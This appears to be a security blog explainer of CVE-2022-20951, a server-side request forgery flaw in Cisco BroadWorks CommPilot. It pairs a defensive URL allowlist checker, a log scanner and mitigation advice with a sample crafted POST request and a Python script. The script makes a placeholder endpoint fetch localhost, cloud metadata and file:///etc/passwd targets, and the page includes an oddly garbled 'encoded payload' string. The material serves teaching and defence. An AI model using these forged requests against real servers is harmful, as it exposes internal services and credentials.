In late 2022, Cisco published details of CVE-2022-20951, a server-side request forgery (SSRF) vulnerability in the web-based management interface of Cisco BroadWorks CommPilot Application Software. It allows an authenticated, remote attacker to make the BroadWorks server issue HTTP requests to destinations of the attacker's choosing, including internal resources the attacker could not reach directly. Let's break down how this works, why it's dangerous, and how an attack might look.
What is CVE-2022-20951?
CVE-2022-20951 affects the CommPilot application of Cisco BroadWorks. It is a server-side request forgery (SSRF): because user-supplied input is not validated properly, an attacker can make the server itself send requests to destinations they choose, including internal systems and resources the attacker has no direct access to.
Cisco’s Advisory:
- Cisco Security Advisory for CVE-2022-20951
Why SSRF is Dangerous
Many web apps take a URL from the user and fetch it on the user's behalf (link previews, downloads, webhooks). A secure app restricts which destinations that fetch may reach. With SSRF the attacker controls the destination, so the request goes out with the server's network position: to private IP space, to services bound to localhost, to admin consoles, or to cloud metadata endpoints such as 169.254.169.254, and the response comes back to the attacker. If those resources are reachable from the server and trust requests from inside the network, they are effectively exposed to anyone who can trigger the forged request.
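The difference between "fetch whatever the user sent" and "fetch only what the server is allowed to reach" is easiest to see in code. The following is an added example written for this page, not code from Cisco or from BroadWorks. It assumes a hypothetical allowlist of two placeholder hosts (cdn.example.com, media.example.net); everything else is standard-library Python. The check parses the URL, rejects non-HTTP schemes and embedded credentials, requires the host to be on the allowlist, and then resolves it and refuses any address that lands in loopback, private, link-local or other non-routable space. The resolver is injectable so the check can be exercised offline.

```python
import ipaddress
import socket
from urllib.parse import urlparse

# Assumed allowlist of hosts the server may fetch from (placeholder names, not from the advisory).
ALLOWED_HOSTS = {"cdn.example.com", "media.example.net"}


def vulnerable_fetch_target(user_url):
    """The pattern the page describes: the user-supplied URL is used as-is.

    Whatever the user sends (http://localhost:808/admin, a link-local metadata
    address, a file:// URL) becomes the destination of a server-side request."""
    return user_url


def resolve_all(hostname):
    """Resolve a hostname to the set of IP address strings it maps to (A and AAAA)."""
    return {info[4][0] for info in socket.getaddrinfo(hostname, None)}


def is_forbidden_ip(ip_str):
    """True for loopback, RFC 1918/ULA, link-local (incl. 169.254.169.254),
    unspecified, multicast and reserved addresses. Unparseable input fails closed."""
    try:
        ip = ipaddress.ip_address(ip_str)
    except ValueError:
        return True
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_unspecified or ip.is_multicast or ip.is_reserved)


def check_outbound_url(user_url, resolve=resolve_all):
    """Return (allowed, reason, addresses).

    `addresses` is the resolved set on success so the caller can connect to a
    pinned IP instead of resolving again (closes the DNS-rebinding window)."""
    parts = urlparse(user_url)
    if parts.scheme not in ("http", "https"):
        return False, "scheme not allowed", set()
    if parts.username is not None or parts.password is not None:
        # http://cdn.example.com@10.0.0.5/ : the real host is the part after '@'
        return False, "credentials in URL", set()
    host = parts.hostname  # already lower-cased, brackets stripped for IPv6 literals
    if not host:
        return False, "no host", set()
    if host not in ALLOWED_HOSTS:
        return False, "host not on allowlist", set()
    try:
        addresses = resolve(host)
    except OSError:
        return False, "unresolvable host", set()
    if not addresses:
        return False, "unresolvable host", set()
    for addr in addresses:
        if is_forbidden_ip(addr):
            return False, f"resolves to internal address {addr}", set()
    return True, "ok", addresses


if __name__ == "__main__":
    # Constructed resolver table so the demo runs without DNS.
    table = {"cdn.example.com": {"93.184.216.34"}, "media.example.net": {"10.0.0.5"}}
    for url in ("http://cdn.example.com/logo.png",
                "http://media.example.net/a.mp3",
                "http://localhost:808/admin",
                "http://169.254.169.254/latest/meta-data/",
                "http://cdn.example.com@10.0.0.5/",
                "file:///etc/passwd"):
        print(url, "->", check_outbound_url(url, table.__getitem__)[:2])
```

Two points worth noting: an allowlisted name that resolves to a private address (media.example.net above) is still refused, because the name is not what the socket connects to; and the caller should connect to the returned addresses rather than the hostname, otherwise a second lookup can return a different answer.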
The Vulnerability in Plain English
Problem:
The CommPilot interface accepted a user-supplied URL (for example in preview or download actions) and issued a server-side request to it without adequately validating the destination.
Triggering the Bug:
An attacker who can log in (even as a low-privilege user) can craft a request that makes the server fetch a location of their choice, say http://localhost:808/admin (a service bound to the loopback interface, unreachable from outside) or a cloud metadata endpoint such as AWS's 169.254.169.254.
How the input looked:
Cisco's advisory does not publish the vulnerable parameter or a working payload; it describes the cause only as insufficient validation of user-supplied input. The encoded string below illustrates the kind of input a weak filter fails to catch and is not taken from the advisory:
{{value}} ["%7b%7bvalue%7d%7d"])}]]
Percent-encoding (%7b for {, %7d for }) and similar tricks are a common way past naive string filters that look for literal characters, which is why validation has to operate on the decoded, parsed URL rather than on the raw string.
Step 1: Authentication
The attacker needs valid login credentials. (Phishing, credential reuse or social engineering could supply these.)
Step 2: Craft a Malicious Request
The attacker sends a specially crafted HTTP request. For example, a vulnerable API endpoint might let them set a URL, which the server then fetches.
Example crafted request (the endpoint path, parameter name and cookie are placeholders; the advisory does not name the vulnerable parameter)
POST /commpilot/preview HTTP/1.1
Host: cisco-broadworks.example.com
Cookie: SessionID=abcd1234
Content-Type: application/json

{
"url": "http://localhost:808/admin"
}
Or an encoded payload meant to slip past a naive string filter (the same illustrative string as above, not a payload from the advisory):
{
"url": "{{value}} [\"%7b%7bvalue%7d%7d\"])}]]"
}
If the server fetches the submitted URL without validating the destination, the request originates from the BroadWorks host itself and can reach addresses that are internal-only or bound to loopback.
Step 3: Harvest Internal Data
Whatever the internal endpoint returns is relayed back to the attacker in the HTTP response, so the server effectively leaks data from its own network.
Below is a very basic example against a hypothetical vulnerable endpoint. The path /commpilot/preview, the JSON parameter "url" and the session cookie are placeholders, not details from Cisco's advisory.
import requests
import urllib3

# Placeholder target and session; change these as needed
HOST = 'https://cisco-broadworks.example.com'
LOGIN_COOKIE = {'SessionID': 'abcd1234'}  # an authenticated session is required

# SSRF payload: a service bound to the loopback interface on the BroadWorks host
target_url = 'http://localhost:808/admin'
data = {
    "url": target_url
}

# verify=False skips TLS certificate checks (lab use only, e.g. a self-signed certificate)
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
response = requests.post(
    f'{HOST}/commpilot/preview',
    cookies=LOGIN_COOKIE,
    json=data,
    verify=False,
    timeout=10,
)
# Whatever the internal endpoint returned is relayed in the response body
print("Status:", response.status_code)
print("Internal Data Gained:", response.text)
With this primitive, the attacker can:
- Read internal files: if internal web servers expose sensitive files (configuration, credentials), their contents come back in the response.
- Probe internal APIs: scan and attack the company's intranet, internal dashboards, or cloud metadata endpoints that trust requests from inside the network.
What Cisco Says
Cisco confirmed that this SSRF vulnerability affects multiple releases of BroadWorks CommPilot Application Software and released fixed software (see the advisory above). Cisco recommends upgrading all affected installations.
Patch ASAP:
Apply Cisco's fixed release; the advisory lists the affected and fixed versions.
Network Segmentation & Firewalls:
Internal resources (admin panels, management networks, cloud metadata endpoints) should not be reachable from the BroadWorks server. Apply egress filtering to the server so a forged request has nowhere useful to go, and on cloud hosts prefer metadata services that require a session token (such as AWS IMDSv2), since a simple forged GET cannot obtain one.
Monitor Logs:
SSRF attempts leave traces. Watch the application's logs for user-supplied URLs pointing at localhost, 127.0.0.0/8, RFC 1918 ranges, link-local 169.254.0.0/16 (including the metadata address 169.254.169.254) or unusual ports, and watch the server's outbound connections for destinations it has no business contacting. Repeated probes from one account are a strong signal, since exploitation requires a valid login.
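To make the log-monitoring advice concrete, here is an added example (written for this page, not tooling from Cisco) that scans constructed sample log lines for fetch targets pointing at internal addresses. The log format (timestamp, user=, action=, url= with the URL percent-encoded) is an assumption; real BroadWorks logs will look different, but the classification logic transfers. It decodes the URL up to twice so double-encoded targets are not missed, flags loopback names, well-known metadata hosts and literal IPs in non-routable ranges, and counts hits per account so repeated probing stands out.

```python
import ipaddress
import re
from collections import Counter
from urllib.parse import unquote, urlparse

# Constructed sample log lines in an assumed key=value format (not real BroadWorks
# output): one line per server-side fetch, with the user-supplied URL percent-encoded.
SAMPLE_LOG = """\
2022-11-05T10:00:01Z user=alice action=preview url=http%3A%2F%2Fcdn.example.com%2Flogo.png
2022-11-05T10:00:07Z user=bob action=preview url=http%3A%2F%2Flocalhost%3A808%2Fadmin
2022-11-05T10:00:09Z user=bob action=preview url=http%3A%2F%2F169.254.169.254%2Flatest%2Fmeta-data%2F
2022-11-05T10:00:12Z user=bob action=download url=http%253A%252F%252F10.20.30.40%253A8443%252F
2022-11-05T10:00:15Z user=carol action=preview url=https%3A%2F%2Fmedia.example.net%2Fa.mp3
"""

LINE_RE = re.compile(r"user=(?P<user>\S+) action=(?P<action>\S+) url=(?P<url>\S+)")
LOOPBACK_NAMES = {"localhost", "localhost.localdomain"}
# Cloud metadata endpoints reachable by name or fixed address.
METADATA_HOSTS = {"169.254.169.254", "metadata.google.internal"}


def host_is_internal(host):
    """Flag loopback names, known metadata hosts, and literal IPs in loopback,
    private, link-local or unspecified ranges. Other hostnames are not judged
    here: deciding those needs DNS resolution, which belongs in the server-side check."""
    if not host:
        return False
    h = host.lower()
    if h in LOOPBACK_NAMES or h in METADATA_HOSTS:
        return True
    try:
        ip = ipaddress.ip_address(h)
    except ValueError:
        return False
    return ip.is_loopback or ip.is_private or ip.is_link_local or ip.is_unspecified


def decode_url(raw, rounds=2):
    """Percent-decode repeatedly, bounded, so double-encoded targets are seen as URLs."""
    value = raw
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_log(log_text):
    """Return one record per fetch whose decoded target points at an internal host."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        target = decode_url(m["url"])
        host = urlparse(target).hostname  # None for malformed input -> not flagged
        if host_is_internal(host):
            hits.append({"user": m["user"], "action": m["action"], "target": target})
    return hits


def users_over_threshold(hits, threshold=2):
    """Accounts with at least `threshold` internal-target fetches: candidates for alerting."""
    counts = Counter(h["user"] for h in hits)
    return {user: n for user, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for h in found:
        print(f"{h['user']:6} {h['action']:9} {h['target']}")
    print("accounts over threshold:", users_over_threshold(found))
```

On the sample input only bob's three fetches are flagged (loopback, the metadata address, and a double-encoded RFC 1918 target), and bob crosses the per-account threshold. Hostnames that are not literal IPs are deliberately left alone here; a name that resolves to internal space is caught by the resolution-time check on the server, not by a log scan.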
Official Advisory:
Cisco Security Advisory: SSRF in BroadWorks CommPilot (CVE-2022-20951)
NIST NVD Entry:
https://nvd.nist.gov/vuln/detail/CVE-2022-20951
Intro to SSRF:
OWASP Server-Side Request Forgery Prevention Cheat Sheet: https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html
Final Thoughts
CVE-2022-20951 shows why web apps must validate every user-controlled destination, even from authenticated users. SSRF is especially dangerous because it turns a web server into a proxy into its own network. If you run Cisco BroadWorks CommPilot, apply the fixed release now, and review any server-side request logic for destination validation.
Timeline
Published on: 11/04/2022 18:15:00 UTC
Last modified on: 11/07/2022 15:57:00 UTC